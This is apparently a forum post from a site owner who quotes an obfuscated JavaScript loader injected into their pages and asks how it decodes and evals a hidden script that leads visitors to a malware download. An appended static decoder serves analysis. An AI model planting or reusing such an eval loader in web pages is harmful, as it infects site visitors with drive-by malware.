A hacker added a JavaScript snippet to many HTML pages of my site. Just after the body tag he added:
<!--<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,10 0,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94, 101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95, 97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,1 02,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--
It somehow directs the browser to a site where the hacker deposited some malware for automatic download.
But I do not understand the details.
try{1-prototype;}catch(asd){x=2;} somehow sets x to 2 - but how does that happen?
v="eva";}if(v)e=window[v+"l"]; somehow creates an eval statement.
f (and then also w ) contain an encrypted statement.
In the for loop, the statement gets decrypted by s=s+fromCharCode((w[j]*1+(9+eval("j%3"))));
and finally executed by e(s); .
Since I hardly ever write JavaScript, I fail to understand the details.
I hope that you have fun with analysing that script, and that you can share some hints on its function.
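Added example, not part of the original post: a static decoder for the encoding the post describes (each array value plus 9 plus the index modulo 3, then `fromCharCode`), returning the hidden script as text instead of handing it to `eval`. The function names, the sample page and the `example.invalid` URL are constructed for illustration.

```javascript
// Decode the scheme from the post: char code = value + 9 + (index % 3).
// The result is returned as text only; nothing here calls eval().
function decodeInjected(values) {
  return values
    .map((v, j) => {
      if (!Number.isInteger(v)) throw new TypeError("non-integer at index " + j);
      return String.fromCharCode(v + 9 + (j % 3));
    })
    .join("");
}

// Inverse of the above, used only to build the harmless constructed sample.
function encodeSample(text) {
  return Array.from(text, (ch, j) => ch.charCodeAt(0) - 9 - (j % 3));
}

// Pull the "f=[...]" literal out of saved page source without running it.
// Whitespace inside a number (copy/paste damage) is dropped before parsing.
function extractArray(source) {
  const m = /\bf\s*=\s*\[([^\]]*)\]/.exec(source);
  if (!m) return null;
  return m[1]
    .split(",")
    .map((t) => t.replace(/\s+/g, ""))
    .filter((t) => t !== "")
    .map(Number);
}

// List URLs in the decoded text so they can be blocked or searched for in logs.
function findUrls(decoded) {
  return decoded.match(/https?:\/\/[^\s"'<>)]+/g) || [];
}

// Constructed sample: a benign statement encoded the same way as the injection.
const SAMPLE_PLAINTEXT = 'var u="http://example.invalid/landing";';
const SAMPLE_PAGE =
  "<body><script>if(x){f=[" + encodeSample(SAMPLE_PLAINTEXT).join(", ") + '];v="eva";}</script>';

function analyse(source) {
  const values = extractArray(source);
  if (values === null) return { found: false, decoded: "", urls: [] };
  const decoded = decodeInjected(values);
  return { found: true, decoded, urls: findUrls(decoded) };
}

console.log(analyse(SAMPLE_PAGE));
```

Run it with Node against a saved copy of an affected page; the decoded text and any URLs it lists can then be compared with web server and proxy logs.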